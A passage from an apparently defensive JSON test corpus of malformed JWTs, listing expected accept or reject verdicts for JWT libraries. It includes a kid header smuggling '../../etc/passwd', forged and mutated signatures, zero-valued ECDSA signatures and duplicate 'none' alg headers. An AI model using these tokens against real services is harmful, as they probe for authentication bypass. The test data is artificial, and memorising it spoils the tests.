    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uL2V0Yy9wYXNzd2QifQ.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHg",
396
    "key": "schism-secret",
397
    "algs": [
398
      "HS256"
399
    ],
400
    "expected_unanimous": "reject",
401
    "notes": "kid='../../etc/passwd' \u2014 sig bogus, value is whether lib surfaces oddly"
402
  },
403
  {
404
    "id": "kid-1aef7966",
405
    "class": "kid-injection",
406
    "severity": "parser-quirk",
407
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ilx1ZDgzZFx1ZGQxMSJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHg",
408
    "key": "schism-secret",
409
    "algs": [
410
      "HS256"
411
    ],
412
    "expected_unanimous": "reject",
413
    "notes": "kid='\ud83d\udd11' \u2014 sig bogus, value is whether lib surfaces oddly"
414
  },
415
  {
416
    "id": "sig-empty",
417
    "class": "sig-mutation",
418
    "severity": "bypass-risk",
419
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.",
420
    "key": "schism-secret",
421
    "algs": [
422
      "HS256"
423
    ],
424
    "expected_unanimous": "reject",
425
    "notes": "sig mutation: empty"
426
  },
427
  {
428
    "id": "sig-zero32",
429
    "class": "sig-mutation",
430
    "severity": "bypass-risk",
431
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
432
    "key": "schism-secret",
433
    "algs": [
434
      "HS256"
435
    ],
436
    "expected_unanimous": "reject",
437
    "notes": "sig mutation: zero32"
438
  },
439
  {
440
    "id": "sig-ones32",
441
    "class": "sig-mutation",
442
    "severity": "bypass-risk",
443
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.__________________________________________8",
444
    "key": "schism-secret",
445
    "algs": [
446
      "HS256"
447
    ],
448
    "expected_unanimous": "reject",
449
    "notes": "sig mutation: ones32"
450
  },
451
  {
452
    "id": "sig-truncated",
453
    "class": "sig-mutation",
454
    "severity": "bypass-risk",
455
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.55nVZ-A9ktH6dL28cKDq",
456
    "key": "schism-secret",
457
    "algs": [
458
      "HS256"
459
    ],
460
    "expected_unanimous": "reject",
461
    "notes": "sig mutation: truncated"
462
  },
463
  {
464
    "id": "sig-doubled",
465
    "class": "sig-mutation",
466
    "severity": "bypass-risk",
467
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.55nVZ-A9ktH6dL28cKDqolUuqZ5B3qmk-IOrOL1NiLI55nVZ-A9ktH6dL28cKDqolUuqZ5B3qmk-IOrOL1NiLI",
468
    "key": "schism-secret",
469
    "algs": [
470
      "HS256"
471
    ],
472
    "expected_unanimous": "reject",
473
    "notes": "sig mutation: doubled"
474
  },
475
  {
476
    "id": "sig-ascii",
477
    "class": "sig-mutation",
478
    "severity": "bypass-risk",
479
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE",
480
    "key": "schism-secret",
481
    "algs": [
482
      "HS256"
483
    ],
484
    "expected_unanimous": "reject",
485
    "notes": "sig mutation: ascii"
486
  },
487
  {
488
    "id": "sig-padded",
489
    "class": "sig-mutation",
490
    "severity": "bypass-risk",
491
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.55nVZ-A9ktH6dL28cKDqolUuqZ5B3qmk-IOrOL1NiLI====",
492
    "key": "schism-secret",
493
    "algs": [
494
      "HS256"
495
    ],
496
    "expected_unanimous": "reject",
497
    "notes": "sig mutation: padded"
498
  },
499
  {
500
    "id": "sig-urlsafe-vs-std",
501
    "class": "sig-mutation",
502
    "severity": "bypass-risk",
503
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.55nVZ+A9ktH6dL28cKDqolUuqZ5B3qmk+IOrOL1NiLI",
504
    "key": "schism-secret",
505
    "algs": [
506
      "HS256"
507
    ],
508
    "expected_unanimous": "reject",
509
    "notes": "sig mutation: urlsafe-vs-std"
510
  },
511
  {
512
    "id": "ecdsa-zero-rs",
513
    "class": "ecdsa-encoding",
514
    "severity": "bypass-risk",
515
    "token": "eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
516
    "key": "-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEZOVHAj2poJe0WbUgpGQsRT//R7TI\nwehXbRRwZ9mmX7I+P+KJmNqTlzxOW+UzCvd0GmxHQCR7PpaqmysAzii4tg==\n-----END PUBLIC KEY-----\n",
517
    "algs": [
518
      "ES256"
519
    ],
520
    "expected_unanimous": "reject",
521
    "notes": "ES256 with r=0, s=0 \u2014 must reject"
522
  },
523
  {
524
    "id": "ecdsa-65byte",
525
    "class": "ecdsa-encoding",
526
    "severity": "bypass-risk",
527
    "token": "eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.AA9_Ym-y5bfKMHh4Ka_tdxc3LwRKzBMVzebumiN9KU7JSS3lP4y6r3APRl_gw0ufO8xw8zCliwUYaYfs-4e7Hbc",
528
    "key": "-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEZOVHAj2poJe0WbUgpGQsRT//R7TI\nwehXbRRwZ9mmX7I+P+KJmNqTlzxOW+UzCvd0GmxHQCR7PpaqmysAzii4tg==\n-----END PUBLIC KEY-----\n",
529
    "algs": [
530
      "ES256"
531
    ],
532
    "expected_unanimous": "reject",
533
    "notes": "ES256 with extra leading zero byte (65 bytes total)"
534
  },
535
  {
536
    "id": "ecdsa-s-zero",
537
    "class": "ecdsa-encoding",
538
    "severity": "bypass-risk",
539
    "token": "eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.D39ib7Llt8oweHgpr-13FzcvBErMExXN5u6aI30pTskAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
540
    "key": "-----BEGIN PUBLIC KEY-----\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEZOVHAj2poJe0WbUgpGQsRT//R7TI\nwehXbRRwZ9mmX7I+P+KJmNqTlzxOW+UzCvd0GmxHQCR7PpaqmysAzii4tg==\n-----END PUBLIC KEY-----\n",
541
    "algs": [
542
      "ES256"
543
    ],
544
    "expected_unanimous": "reject",
545
    "notes": "ES256 with valid r and s=0"
546
  },
547
  {
548
    "id": "claim-71dc9c73",
549
    "class": "claim-typing",
550
    "severity": "dos-risk",
551
    "token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjoiOTk5OTk5OTk5OSJ9.i8Xg2-_xYp68_Ojs8oBWT6b3rItDxHD73CR_XP14zLthl5DEX0DpBBMiWkijdgxS4lirt7U4BZShxXhKWGBWDJ_lzYgBCMfaSKxlFWbHkBYj8fxKkB_6uvACErurngAqz6d8aRah3R3FB57kFSDRW1oTmQaRinrn3yaGwBOAYwAXE7YS5QpiLpxnUZqQzMvhJus5QL5mSVpw0BIa4BkmzT4S6bIji3cflQFYtCDNZLeWQQL7qLTw8hThTYbSNjJN4FZ2KPlWNyMB-NxiEjkeyd4FpxAglHmdR579p6KyPk8_LMHpVRZwcu6aSFqT90IOZ_syWwpzFMucd0NAfb5r4Q",
552
    "key": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5AYVTVQV6ywtYdpENyW6\nRWzTBismDMeCSFhNDc32Jw3ppHrsy1pAurEm+HI4TdAIr9fV5nu6wAiEOlkAzKhQ\n1RX7kgMieUuxIdAiEDIpboDZ7+cEXpwXPXdayLG4M9PXj1FkvqNRn6fBLKJLbPX4\nSHQVLInzUM3Iae+tQQgotFhYPNK6fw8XBRasxnmP6LWSiKsqt+w1CKBcyqSRwQXM\n3x958PFCRpJPdcs1o40v8iND+p+QP8Mnkl3E8X1SJit/heroGBynXUGAgFa+U6gA\ncWotnsdBaUGiE9BBCeHDdGH5F92/haoURUcIG4SNNcYZJxmeQ5U2UCbrRfLAVEni\nyQIDAQAB\n-----END PUBLIC KEY-----\n",
553
    "algs": [
554
      "RS256"
555
    ],
556
    "expected_unanimous": "accept",
557
    "notes": "exp as string"
558
  },
559
  {
560
    "id": "claim-bce9753f",
561
    "class": "claim-typing",
562
    "severity": "dos-risk",
563
    "token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjp0cnVlfQ.EAIHD_Af1JVN8qoH4CkwONnMtBy9Se5-I-EdrAGxQpa55foXE2QYlCQJyk583-Do3lkUgeVOvOxQP7g_9x73IbCLnbn_95veyYBWeaAs1dCJvpqtWJ04arzM4YIVCBk9fIIGGxS8xqfubK7uu5hcxPSI7YwQTJ9i3eZf86OoZiwahGKeifH7YHmSmxN3tTX_Dg6bTc7biLA0DZ46PdcBe1QKR-KV1rRzVbQgF95gBL2wJ8t1jeGHLM_ZY-5hHA8YbmURc87ZnjL6wxW7zhYt7nDm00Xz5O9SB5AfTzL6WJeFMQ1eOjv9SEC760wLT7iKMJeo63zWaOwOHc3dvjdTTA",
564
    "key": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5AYVTVQV6ywtYdpENyW6\nRWzTBismDMeCSFhNDc32Jw3ppHrsy1pAurEm+HI4TdAIr9fV5nu6wAiEOlkAzKhQ\n1RX7kgMieUuxIdAiEDIpboDZ7+cEXpwXPXdayLG4M9PXj1FkvqNRn6fBLKJLbPX4\nSHQVLInzUM3Iae+tQQgotFhYPNK6fw8XBRasxnmP6LWSiKsqt+w1CKBcyqSRwQXM\n3x958PFCRpJPdcs1o40v8iND+p+QP8Mnkl3E8X1SJit/heroGBynXUGAgFa+U6gA\ncWotnsdBaUGiE9BBCeHDdGH5F92/haoURUcIG4SNNcYZJxmeQ5U2UCbrRfLAVEni\nyQIDAQAB\n-----END PUBLIC KEY-----\n",
565
    "algs": [
566
      "RS256"
567
    ],
568
    "expected_unanimous": "accept",
569
    "notes": "exp as bool true"
570
  },
571
  {
572
    "id": "claim-64a1ac41",
573
    "class": "claim-typing",
574
    "severity": "dos-risk",
575
    "token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjpbOTk5OTk5OTk5OV19.UN_uLgBYgr_Fj_gvFJ1WeDoeVsCaLRryORmmbc5NbYh8po3tntcIv7BgGs8MQg_NujjU290l7R2-Q8MeawKcB737FuVHTwsB2IJGxQGkKrJqVMM-y_GGFcuJQlGSSopyOFah5F3w3_at1ssEQXUsKvjaTT6UHZ81j2N_O07DAi3OfL32XoWjV068ZFx0C-xrNvcTV18sA7tSWlgdzGX3koJfamFmJYcEgSqEIUODd4VFARNEHbFpTGxZdkwRn1jZ_NlaWdG3M6BRIfpXs7Uf9mbNE_XbbyUFGp_IylIptvDkufZM4d7PxO3-feURAH073MOvNJX1kTkyJOyn8Gz0tw",
576
    "key": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5AYVTVQV6ywtYdpENyW6\nRWzTBismDMeCSFhNDc32Jw3ppHrsy1pAurEm+HI4TdAIr9fV5nu6wAiEOlkAzKhQ\n1RX7kgMieUuxIdAiEDIpboDZ7+cEXpwXPXdayLG4M9PXj1FkvqNRn6fBLKJLbPX4\nSHQVLInzUM3Iae+tQQgotFhYPNK6fw8XBRasxnmP6LWSiKsqt+w1CKBcyqSRwQXM\n3x958PFCRpJPdcs1o40v8iND+p+QP8Mnkl3E8X1SJit/heroGBynXUGAgFa+U6gA\ncWotnsdBaUGiE9BBCeHDdGH5F92/haoURUcIG4SNNcYZJxmeQ5U2UCbrRfLAVEni\nyQIDAQAB\n-----END PUBLIC KEY-----\n",
577
    "algs": [
578
      "RS256"
579
    ],
580
    "expected_unanimous": "accept",
581
    "notes": "exp as 1-elem array"
582
  },
583
  {
584
    "id": "claim-0e144c74",
585
    "class": "claim-typing",
586
    "severity": "dos-risk",
587
    "token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjpudWxsfQ.E3w15AOUMW_7G0u30zSTktmoZynAaFRQaCuWx84Ru6OECovtozcRVgySiOgzUnAsgVvGgMaIc6HbPWEgkznKl34-Q0dHQOhOMAxBX34EEbiY5kGutPmllQF8QafEzIHhEMLs5xDd2_8qFji-4SzztnBSNlSw0d0Ohp25OGt2wAowv0Em1sy1PtW2aCN-MwhXht3MBQb4RuOga38ljmClncakNz9cl4lYj97SvBGAX8Z9dcRKy6DLKhL7YsEQ-zeXvkYeY4s54oz4jkvQ5I0kIugzEXre7bZuqzfc-ujprJuH481cJsaplm6Z4dAw4tkU0lTwvCCnH27X3eHLQebXxA",
588
    "key": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5AYVTVQV6ywtYdpENyW6\nRWzTBismDMeCSFhNDc32Jw3ppHrsy1pAurEm+HI4TdAIr9fV5nu6wAiEOlkAzKhQ\n1RX7kgMieUuxIdAiEDIpboDZ7+cEXpwXPXdayLG4M9PXj1FkvqNRn6fBLKJLbPX4\nSHQVLInzUM3Iae+tQQgotFhYPNK6fw8XBRasxnmP6LWSiKsqt+w1CKBcyqSRwQXM\n3x958PFCRpJPdcs1o40v8iND+p+QP8Mnkl3E8X1SJit/heroGBynXUGAgFa+U6gA\ncWotnsdBaUGiE9BBCeHDdGH5F92/haoURUcIG4SNNcYZJxmeQ5U2UCbrRfLAVEni\nyQIDAQAB\n-----END PUBLIC KEY-----\n",
589
    "algs": [
590
      "RS256"
591
    ],
592
    "expected_unanimous": "accept",
593
    "notes": "exp as null"
594
  },
595
  {
596
    "id": "claim-8a5d7859",
597
    "class": "claim-typing",
598
    "severity": "bypass-risk",
599
    "token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjotMX0.2et3X8Hb-2COVxIg5t1GLovqGgF8NcoHzBqW8DmCO4WaJAjpIxHhXLBB3RftvSxJOxi3AUDvJxmBSeRKwI6K6vtgBS0jgclPJltvkoQPV308jw0hdxwE3DgSAYSJjCWO624wJYaj7wf7u2XgH7_AQsqMnd-fFFeLiHU347jTznvdHgsTIK4pw_-t7rHsJuqEAIdvxhXyCtRtVMiQ1FWC8C5cydBltFojY7ooS6RCC1-PsXnBtYu9SjHCQijAaOgvsdc_ifZpagV9tMpTdrSICEvmhDa3jy0If4vQ4XabjheQEg6blpNH6NTmU2ZRsMKkOASeAg3FjKOHLK8e3pbVMg",
600
    "key": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5AYVTVQV6ywtYdpENyW6\nRWzTBismDMeCSFhNDc32Jw3ppHrsy1pAurEm+HI4TdAIr9fV5nu6wAiEOlkAzKhQ\n1RX7kgMieUuxIdAiEDIpboDZ7+cEXpwXPXdayLG4M9PXj1FkvqNRn6fBLKJLbPX4\nSHQVLInzUM3Iae+tQQgotFhYPNK6fw8XBRasxnmP6LWSiKsqt+w1CKBcyqSRwQXM\n3x958PFCRpJPdcs1o40v8iND+p+QP8Mnkl3E8X1SJit/heroGBynXUGAgFa+U6gA\ncWotnsdBaUGiE9BBCeHDdGH5F92/haoURUcIG4SNNcYZJxmeQ5U2UCbrRfLAVEni\nyQIDAQAB\n-----END PUBLIC KEY-----\n",
601
    "algs": [
602
      "RS256"
603
    ],
604
    "expected_unanimous": "reject",
605
    "notes": "exp negative -1"
606
  },
607
  {
608
    "id": "claim-27f3c75a",
609
    "class": "claim-typing",
610
    "severity": "bypass-risk",
611
    "token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjowfQ.lURES6SYKVUriQoNo6gc1iHQdf-E1vGQOjnkZDNZLlnwCHu9LzOz1Gpuo0a622pJ6ROr1y23ZIXes_c_o64uzBoT0m9WSgz5v1E0jWek15XnRU17LZF1La5ZIEq1ohseknkioBCn33pkw5V4Z7TqF2keoQqJ-5uBlf6ggdZM9BJTJR3jzq-7NgTa-duFXxklRnZvOBxAQIdy-WvzhwFEjr3EPaabAcTRLx5qGaus6w9mQ9Yq8HwuY0CVyr_M9kvqIKxUEYtOnTqipMplkSwTJ2xAQkj5TonNXcZonq6tp4wm7S_PaCYsCDqwvjfuxj1Cn3Hr_2L4erDWVcyV_sTGAg",
612
    "key": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5AYVTVQV6ywtYdpENyW6\nRWzTBismDMeCSFhNDc32Jw3ppHrsy1pAurEm+HI4TdAIr9fV5nu6wAiEOlkAzKhQ\n1RX7kgMieUuxIdAiEDIpboDZ7+cEXpwXPXdayLG4M9PXj1FkvqNRn6fBLKJLbPX4\nSHQVLInzUM3Iae+tQQgotFhYPNK6fw8XBRasxnmP6LWSiKsqt+w1CKBcyqSRwQXM\n3x958PFCRpJPdcs1o40v8iND+p+QP8Mnkl3E8X1SJit/heroGBynXUGAgFa+U6gA\ncWotnsdBaUGiE9BBCeHDdGH5F92/haoURUcIG4SNNcYZJxmeQ5U2UCbrRfLAVEni\nyQIDAQAB\n-----END PUBLIC KEY-----\n",
613
    "algs": [
614
      "RS256"
615
    ],
616
    "expected_unanimous": "reject",
617
    "notes": "exp zero"
618
  },
619
  {
620
    "id": "claim-3a15a728",
621
    "class": "claim-typing",
622
    "severity": "dos-risk",
623
    "token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5LjV9.RY8PqyYdG_Fc-Kuf1o83_vlch-8UeXkzKEhDlMmlrTULAdFg9-mh2x90IyGUep3vIN20v9rVqv3cbDBDvr5_uV0LzS8ltWIvCtwcm5mDc3h-zgmfkHYd96jDjJkG38nO_bFitnqR12bqJNWRKAmP-_8Mh66yGtSdH2SOuyvhVW9Hgl8Xb6xgans0aZ8RU9_IGA_gvhY7RBXbv6VLfp2GK4E0hm4uaWNXMbgIiZQ0aJ6m1IMVwiqhLJru_2j6IoeUYr3M-6Vdm95FCUrL2ck3o9_4amkeSuRp3tc39iQyzylXficH5ZxoPrFZTNrI-c3afpAra8n7S7CVV5G19-utYQ",
624
    "key": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5AYVTVQV6ywtYdpENyW6\nRWzTBismDMeCSFhNDc32Jw3ppHrsy1pAurEm+HI4TdAIr9fV5nu6wAiEOlkAzKhQ\n1RX7kgMieUuxIdAiEDIpboDZ7+cEXpwXPXdayLG4M9PXj1FkvqNRn6fBLKJLbPX4\nSHQVLInzUM3Iae+tQQgotFhYPNK6fw8XBRasxnmP6LWSiKsqt+w1CKBcyqSRwQXM\n3x958PFCRpJPdcs1o40v8iND+p+QP8Mnkl3E8X1SJit/heroGBynXUGAgFa+U6gA\ncWotnsdBaUGiE9BBCeHDdGH5F92/haoURUcIG4SNNcYZJxmeQ5U2UCbrRfLAVEni\nyQIDAQAB\n-----END PUBLIC KEY-----\n",
625
    "algs": [
626
      "RS256"
627
    ],
628
    "expected_unanimous": "accept",
629
    "notes": "exp float well-future"
630
  },
631
  {
632
    "id": "claim-27501451",
633
    "class": "claim-typing",
634
    "severity": "dos-risk",
635
    "token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6IjE3MDAwMDAwMDAiLCJleHAiOjk5OTk5OTk5OTl9.SbtFkdd3Kps06_tODP5qSpGBi4ObPv--21l3yw84HkpoClyToaJU_b8v7Icro4FwAO6FUoMYAZTjECnxv_mVfcXMtl-3H8FKp2mmRJEvBul0DBTv6I3napYgQHdZgtPobKFpnIdf3lMURn9MbX9TjMwa7XLecxPejfyB2B3hTezuiLHtbl_a51EIdHqDEItRYDS9bzXVLvIrlKPzstHw1hU5EObHD7segLWDSwpLvCS8ncZz0KhEoA54anQAyvwINKDuMs_YKcKyBydqRVXayiHUkSm7VGSGi5e1C22CzCMR2d3VQ5OhArLfU308rHZEoA5rUjn0_mb8HifoxcgUEA",
636
    "key": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5AYVTVQV6ywtYdpENyW6\nRWzTBismDMeCSFhNDc32Jw3ppHrsy1pAurEm+HI4TdAIr9fV5nu6wAiEOlkAzKhQ\n1RX7kgMieUuxIdAiEDIpboDZ7+cEXpwXPXdayLG4M9PXj1FkvqNRn6fBLKJLbPX4\nSHQVLInzUM3Iae+tQQgotFhYPNK6fw8XBRasxnmP6LWSiKsqt+w1CKBcyqSRwQXM\n3x958PFCRpJPdcs1o40v8iND+p+QP8Mnkl3E8X1SJit/heroGBynXUGAgFa+U6gA\ncWotnsdBaUGiE9BBCeHDdGH5F92/haoURUcIG4SNNcYZJxmeQ5U2UCbrRfLAVEni\nyQIDAQAB\n-----END PUBLIC KEY-----\n",
637
    "algs": [
638
      "RS256"
639
    ],
640
    "expected_unanimous": "accept",
641
    "notes": "iat as string"
642
  },
643
  {
644
    "id": "claim-565b5e18",
645
    "class": "claim-typing",
646
    "severity": "bypass-risk",
647
    "token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5LCJuYmYiOjk5OTk5OTk5OTl9.YggnPUmuKIxLrD7FOcVD50X3-LKSoHSM5HII1zZaAsh3VFbd2yIoWcJoVQECi73JGpALOIgsmrZ4DJt5PosDB8r1pM0kyhmWiL61N9RWaSTA2u_ePTb1spxybfp_gbEgJiar08npo_3vE8nebY1YRS2IRR_CaijRXQU7mL8YYYDlwIwaeiWQ0YDkRZuBnUTyVUC1i2mqgr-1-9n8RYyabEB2sppkb5BeHlDGqXcfJL68P5vbEiYVyH4hTCiwtnb_x__w_0lgmtkYidkM0sZXfiApE5ePsYvZzS_Ji_nvyuVnMQeV9dAlFhVVm6LzEL0msfmsrvLnOwV1xGjKq99BYQ",
648
    "key": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5AYVTVQV6ywtYdpENyW6\nRWzTBismDMeCSFhNDc32Jw3ppHrsy1pAurEm+HI4TdAIr9fV5nu6wAiEOlkAzKhQ\n1RX7kgMieUuxIdAiEDIpboDZ7+cEXpwXPXdayLG4M9PXj1FkvqNRn6fBLKJLbPX4\nSHQVLInzUM3Iae+tQQgotFhYPNK6fw8XBRasxnmP6LWSiKsqt+w1CKBcyqSRwQXM\n3x958PFCRpJPdcs1o40v8iND+p+QP8Mnkl3E8X1SJit/heroGBynXUGAgFa+U6gA\ncWotnsdBaUGiE9BBCeHDdGH5F92/haoURUcIG4SNNcYZJxmeQ5U2UCbrRfLAVEni\nyQIDAQAB\n-----END PUBLIC KEY-----\n",
649
    "algs": [
650
      "RS256"
651
    ],
652
    "expected_unanimous": "reject",
653
    "notes": "nbf far future"
654
  },
655
  {
656
    "id": "claim-4a915465",
657
    "class": "claim-typing",
658
    "severity": "dos-risk",
659
    "token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOjEyMzQ1LCJpYXQiOjE3MDAwMDAwMDAsImV4cCI6OTk5OTk5OTk5OX0.DycFEm_ghVan6Ea4CsFufcpnzt8G4nFTjSjs0emywszJiflWl1MsCTQSY7ZW7KDujn3rqe-YMlSKniSp3olu7a4kizKg8_JAJ_AyjRmtTBxYe7g-aAiCAd_LGAKukgz3TPU3052Ew5vR6x-IOLEGHOpSr9gcAnS9qUo7DQJVM-mY6fMu05MQaysyNdhA2-yB89sRK1KThFmKVQlhbRVh4Pxw02Fj4-8VqhuMfb_RA5fnHAOsbBXwXVxiuo1gc-q3bQ8zyuCjty9dEx4_zDoVkZlll6ajGDac51EYmOn5LMZVMDKzy-YhD5oS9nJKLmPVPTukrv7nBEskjW-0cJ0GXw",
660
    "key": "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5AYVTVQV6ywtYdpENyW6\nRWzTBismDMeCSFhNDc32Jw3ppHrsy1pAurEm+HI4TdAIr9fV5nu6wAiEOlkAzKhQ\n1RX7kgMieUuxIdAiEDIpboDZ7+cEXpwXPXdayLG4M9PXj1FkvqNRn6fBLKJLbPX4\nSHQVLInzUM3Iae+tQQgotFhYPNK6fw8XBRasxnmP6LWSiKsqt+w1CKBcyqSRwQXM\n3x958PFCRpJPdcs1o40v8iND+p+QP8Mnkl3E8X1SJit/heroGBynXUGAgFa+U6gA\ncWotnsdBaUGiE9BBCeHDdGH5F92/haoURUcIG4SNNcYZJxmeQ5U2UCbrRfLAVEni\nyQIDAQAB\n-----END PUBLIC KEY-----\n",
661
    "algs": [
662
      "RS256"
663
    ],
664
    "expected_unanimous": "accept",
665
    "notes": "sub as int"
666
  },
667
  {
668
    "id": "hdr-dup-alg-keys-with-valid-hs256-sig",
669
    "class": "header-quirk",
670
    "severity": "bypass-risk",
671
    "token": "eyJhbGciOiJub25lIiwiYWxnIjoiSFMyNTYiLCJ0eXAiOiJKV1QifQ.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.YnVLIJ3tfFXcQDYi4tSOI-IdV8VpM2yIq8dO09N4sXU",
672
    "key": "schism-secret",
673
    "algs": [
674
      "HS256"
675
    ],
676
    "expected_unanimous": "accept",
677
    "notes": "dup alg keys; if last-wins (HS256), sig is valid; if first-wins (none), sig is bogus"
678
  },
679
  {
680
    "id": "hdr-dup-alg-none-last",
681
    "class": "header-quirk",
682
    "severity": "bypass-risk",
683
    "token": "eyJhbGciOiJIUzI1NiIsImFsZyI6Im5vbmUiLCJ0eXAiOiJKV1QifQ.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.YnVLIJ3tfFXcQDYi4tSOI-IdV8VpM2yIq8dO09N4sXU",
684
    "key": "schism-secret",
685
    "algs": [
686
      "HS256"
687
    ],
688
    "expected_unanimous": "reject",
689
    "notes": "dup alg keys, none last; first-wins lib accepts (sig good for HS256)"
690
  },
691
  {
692
    "id": "hdr-json-comment",
693
    "class": "header-quirk",
694
    "severity": "parser-quirk",
695
    "token": "ey8qeCovImFsZyI6IkhTMjU2IiwidHlwIjoiSldUIn0.eyJzdWIiOiJhbGljZSIsImlhdCI6MTcwMDAwMDAwMCwiZXhwIjo5OTk5OTk5OTk5fQ.zhBe076cVdhUHrIUXBD66oQ8jrbPHc2ljG38Oy4qGdc",
696
    "key": "schism-secret",
697
    "algs": [
698
